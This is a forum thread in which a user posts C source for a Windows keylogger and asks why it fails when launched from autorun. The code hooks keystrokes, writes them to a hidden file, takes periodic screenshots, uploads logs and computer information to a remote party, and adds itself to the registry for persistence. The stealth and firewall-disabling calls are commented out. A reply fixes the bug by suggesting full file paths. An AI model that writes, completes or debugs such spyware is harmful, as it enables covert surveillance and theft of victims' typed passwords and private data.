-
July 26th, 2013, 09:00 AM
#1
Keylogger problem
I have the source code below,and it works perfect when i run it with double click.It captures keystrokes and makes screen shots for every 100 keystrokes + it can be controled remotely from another computer.
The problem is that when it is added to registry by calling SetAutorunEnable("JACKAL",true) function,it starts and captures keystrokes and everything,but it doesn't write to "work.n6" file and it doesn't increment pressed and photo_contor values.And i dont know why! Please help! I know that something is wrong in KeyboardEvent or JACKAL but i dont know what.Everything else works just fine!
#include "NZT.h"
LRESULT WINAPI KeyboardEvent (int nCode, WPARAM wParam, LPARAM lParam)
{
f = fopen("work.n6","a+");
wchar_t photo_name[MAX_PATH];
char * use;
LPWSTR convert;
if ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
{
static int pressed = 0;
static int photo_contor = 0;
f = fopen("work.n6","a+");
KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);
DWORD dwMsg = 1;
dwMsg += hooked_key.scanCode << 0x10;
dwMsg += hooked_key.flags << 0x18;
char lpszKeyName[0x400] = {0};
lpszKeyName[0] = '[';
int i = GetKeyNameText(dwMsg, (lpszKeyName + 1),0xFF) + 1;
int key = hooked_key.vkCode;
lpszKeyName[i] = ']';
//Gamma Border
if (key >= 'A' && key <= 'Z')
{
if (GetAsyncKeyState(VK_SHIFT)>= 0) key += 0x20;
if (f!=NULL)
fprintf(f,"%c", key);
pressed += 1;
}
else
{
if (f != NULL)
fprintf(f,"%s", lpszKeyName);
pressed += 1;
}
hide_file("work.n6");
hide_file("data.n6");
if (pressed > 100 /*&& connection_possible*/)
{
fclose(f);
uploadFile("work.n6","work.txt");
_itow(photo_contor,photo_name,0xA);
convert = wcscat(photo_name,L".jpeg");
ScreenShot(convert,50);
use = wide_to_utf8(convert);
uploadFile(use,use);
hide_file(use);
if (photo_contor > 0)
{
_itow(photo_contor - 1,photo_name,0xA);
convert = wcscat(photo_name,L".jpeg");
DeleteFile(wide_to_utf8(convert));
}
pressed = 0;
photo_contor ++;
}
fclose(f);
}
return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
}
DWORD WINAPI JACKAL(LPVOID lpParm)
{
HINSTANCE hins;
hins = GetModuleHandle(NULL);
hKeyboardHook = SetWindowsHookEx ( WH_KEYBOARD_LL, (HOOKPROC) KeyboardEvent, hins, 0);
MSG message;
while (GetMessage(&message,NULL,0,0))
{
TranslateMessage( &message );
DispatchMessage( &message );
}
UnhookWindowsHookEx(hKeyboardHook);
return 0;
}
void wmain()
{
//stealth();
//disable_firewall_UAC();
auto_hide();
SetAutorunEnable("JACKAL",true);
WSAStartup(0x0101,&wsdata);
getComputerInfo();
writeComputerInfo();
uploadComputerInfo();
tasks[0] = CreateThread( NULL, 0,
(LPTHREAD_START_ROUTINE)createServer, NULL, 0, NULL);
tasks[1] = CreateThread( NULL, 0,
(LPTHREAD_START_ROUTINE)JACKAL,NULL, 0, NULL);
WaitForMultipleObjects(2, tasks, TRUE, INFINITE );
WSACleanup();
}
-
July 26th, 2013, 09:04 AM
#2
Re: Keylogger problem
You have to always use full path names rather than the local ones.
Victor Nijegorodov
-
July 26th, 2013, 09:17 AM
#3
Re: Keylogger problem
Yes VictorN,i will take that into consideration.Thanks!
-
July 26th, 2013, 09:28 AM
#4
Re: Keylogger problem
Man you are a genius! It works thanks!
I've replaced "work.n6" with the full filename path!
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|